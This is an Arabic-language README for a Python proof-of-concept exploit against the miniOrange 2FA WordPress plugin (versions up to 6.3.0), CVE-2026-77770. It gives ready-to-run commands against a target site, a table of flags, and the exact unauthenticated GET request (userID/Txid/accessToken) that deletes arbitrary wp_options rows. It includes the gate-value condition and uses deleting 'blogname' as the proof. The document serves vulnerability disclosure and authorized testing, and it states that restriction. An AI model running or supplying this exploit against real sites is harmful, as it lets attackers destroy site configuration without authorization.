
Python PoC لـ CVE-2026-77770، وهي ثغرة حذف تعسفي لخيارات WordPress بدون مصادقة في إضافة miniOrange 2FA (<= 6.3.0) عبر رابط التحقق من البريد الإلكتروني.
miniOrange 2FA CVE POC
miniOrange 2FA (إضافة WordPress miniorange-2-factor-authentication) ≤ 6.3.0 — حذف تعسفي غير مُصادَق عليه لخيارات WordPress عبر رابط التحقق من البريد الإلكتروني (userID / Txid / accessToken).
للاختبار المُصرَّح به فقط. لا تشغّل هذا ضد أنظمة لا تملكها أو لا تملك إذنًا باختبارها.
يتطلب: Python 3، المكتبة القياسية فقط.
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test --delete blogname
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u https://TARGET --delete blogname --insecure
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u TARGET --delete blogname
| العلم | ما يفعله |
|---|
-u / --url | جذر موقع WordPress (مطلوب). http:// أو https://؛ يُجرَّب اسم المضيف كـ HTTPS أولًا، ثم HTTP. تُعاد محاولة TLS الموقّع ذاتيًا تلقائيًا |
--test | ضيف: إصدار الإضافة + نافذة التحقق من البريد الإلكتروني |
--delete OPTION | حذف صف wp_options ذلك. blogname مرئي عبر /wp-json/ (BEFORE / AFTER) |
--gate OPTION | الخيار الذي تكون قيمته المخزّنة 3 (بوابة Txid). قابل للتكرار. الافتراضي: wp_page_for_privacy_policy، ثم thread_comments_depth |
--insecure | تخطي التحقق من TLS |
--timeout | مهلة HTTP بالثواني (الافتراضي 30) |
غير مُصادَق عليه. الأداة عبارة عن طلب GET إلى /?userID=OPTION&Txid=GATE&accessToken=x. يجب أن يحمل GATE حاليًا العدد الصحيح 3. عند تفويت نافذة الـ 5 دقائق، تكتب الإضافة أيضًا GATE=0.
--test لا يحذف. --delete blogname هو الإثبات العام (عنوان الموقع في /wp-json/ يصبح فارغًا). الإصدار 6.3.1 يضيف بادئات للمفاتيح (mo2f_oobe_*) لذا لا تُحذف الأسماء غير المُبادَئة.
Stdout: VERSION، HANDLER، PRESENT، SITENAME، OPTION، BEFORE، AFTER، GATE، VULNERABLE، NOT_VULNERABLE، NOT_FOUND، ATTEMPTED.

CVE: CVE-2026-77770. سجل تغييرات الإضافة 6.3.1.